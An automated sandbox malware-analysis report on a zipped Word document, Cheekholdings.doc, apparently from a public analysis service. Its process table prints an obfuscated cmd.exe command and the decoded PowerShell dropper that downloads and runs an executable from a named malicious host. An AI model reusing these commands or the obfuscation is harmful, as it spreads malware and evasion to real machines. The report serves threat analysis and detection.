File name: | Potential Malware.zip |
Full analysis: | https://app.any.run/tasks/0f81f068-972d-45b6-b3b0-12afeea78d55 |
Verdict: | Malicious activity |
Analysis date: | December 18, 2018, 13:31:08 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/zip |
File info: | Zip archive data, at least v2.0 to extract |
MD5: | 3D8666A905EF319507FBAF0D384D633C |
SHA1: | 50A905273C55E0C31742F808CEE8DC75276A9A78 |
SHA256: | 7E10BC9F7900404EB0B68E6CCA2E1A420DDE21E471E9652D03810CD70FEA790F |
SSDEEP: | 768:xNEaza+nUG5+fil1qScLhJbBxQo+To25WS6+tRhK+cM9z4yLvGefQ:fEpXyl8SOhJlxQoKoordRhKc9zx+e4 |
.zip | | | ZIP compressed archive (100) |
---|
ZipRequiredVersion: | 20 |
---|---|
ZipBitFlag: | - |
ZipCompression: | Deflated |
ZipModifyDate: | 2018:12:18 08:30:14 |
ZipCRC: | 0x8ad06ada |
ZipCompressedSize: | 41346 |
ZipUncompressedSize: | 62848 |
ZipFileName: | Cheekholdings.doc |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2964 | "C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\Potential Malware.zip" | C:\Program Files\WinRAR\WinRAR.exe | — | explorer.exe |
User: admin Company: Alexander Roshal Integrity Level: MEDIUM Description: WinRAR archiver Version: 5.60.0 | ||||
2944 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Rar$DIa2964.39434\Cheekholdings.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | WinRAR.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Exit code: 0 Version: 14.0.6024.1000 | ||||
4020 | c:\LfRWscp\jzcKOAbAt\BWDJOMYbuEn\..\..\..\windows\system32\cmd.exe /c %ProgramData:~0,1%%ProgramData:~9,2% /V/C"set zUI=;'aVi'=Gtr$}}{hctac}};kaerb;'ZNB'=CLN$;juS$ metI-ekovnI{ )00008 eg- htgnel.)juS$ metI-teG(( fI;'SUq'=fiO$;)juS$ ,Rmz$(eliFdaolnwoD.pvV${yrt{)sXu$ ni Rmz$(hcaerof;'exe.'+ttr$+'\'+pmet:vne$=juS$;'EoL'=QMX$;'008' = ttr$;'ErR'=VsO$;)'@'(tilpS.'sdd.31onixis=l?php.m2ke204o/oqnes-zer/moc.htsidnocsi//:ptth'=sXu$;tneilCbeW.teN tcejbo-wen=pvV$;'IVB'=STT$ llehsrewop&&for /L %J in (356,-1,0)do set FvI1=!FvI1!!zUI:~%J,1!&&if %J lss 1 call %FvI1:*FvI1!=%" | c:\windows\system32\cmd.exe | — | WINWORD.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2592 | CmD /V/C"set zUI=;'aVi'=Gtr$}}{hctac}};kaerb;'ZNB'=CLN$;juS$ metI-ekovnI{ )00008 eg- htgnel.)juS$ metI-teG(( fI;'SUq'=fiO$;)juS$ ,Rmz$(eliFdaolnwoD.pvV${yrt{)sXu$ ni Rmz$(hcaerof;'exe.'+ttr$+'\'+pmet:vne$=juS$;'EoL'=QMX$;'008' = ttr$;'ErR'=VsO$;)'@'(tilpS.'sdd.31onixis=l?php.m2ke204o/oqnes-zer/moc.htsidnocsi//:ptth'=sXu$;tneilCbeW.teN tcejbo-wen=pvV$;'IVB'=STT$ llehsrewop&&for /L %J in (356,-1,0)do set FvI1=!FvI1!!zUI:~%J,1!&&if %J lss 1 call %FvI1:*FvI1!=%" | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2332 | powershell $TTS='BVI';$Vvp=new-object Net.WebClient;$uXs='http://iscondisth.com/rez-senqo/o402ek2m.php?l=sixino13.dds'.Split('@');$OsV='RrE';$rtt = '800';$XMQ='LoE';$Suj=$env:temp+'\'+$rtt+'.exe';foreach($zmR in $uXs){try{$Vvp.DownloadFile($zmR, $Suj);$Oif='qUS';If ((Get-Item $Suj).length -ge 80000) {Invoke-Item $Suj;$NLC='BNZ';break;}}catch{}}$rtG='iVa'; | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | cmd.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
2944 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR8EB4.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2944 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\85051373.wmf | — | |
MD5:— | SHA256:— | |||
2944 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\399890F9.wmf | — | |
MD5:— | SHA256:— | |||
2332 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\HY4D9RDY6ZPICNBZZKGW.temp | — | |
MD5:— | SHA256:— | |||
2944 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~DF3E827A96059D864C.TMP | — | |
MD5:— | SHA256:— | |||
2944 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{94CC09CA-6D5C-4E82-80FF-B8B07FF6F6DB}.tmp | — | |
MD5:— | SHA256:— | |||
2944 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{E30220D1-5EE6-4A03-A53F-3AF358B617DB}.tmp | — | |
MD5:— | SHA256:— | |||
2944 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3B5726BA.wmf | wmf | |
MD5:D03255B7CEBC84DF144838CEC1444CD5 | SHA256:28E7B88ED3E38E99DA28968A536FAA26CA389A86166B7AD09BB4FA02B27A8D4B | |||
2332 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:6073B6FC66D2E68644893344F6904E4A | SHA256:0F2F61C8DFC3A20C7A5E5133C19BA1493441440E5477254273F28F6F668E64B3 | |||
2944 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:537FA8DC5797E036E62D093EB05E2AAD | SHA256:B5851A0D213F1160D3B5F11D29BC57F856348A4257F812194D803DA01438C151 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2332 | powershell.exe | GET | 404 | 185.231.155.12:80 | http://iscondisth.com/rez-senqo/o402ek2m.php?l=sixino13.dds | unknown | — | — | suspicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2332 | powershell.exe | 185.231.155.12:80 | iscondisth.com | — | — | suspicious |
Domain | IP | Reputation |
---|---|---|
iscondisth.com |
| suspicious |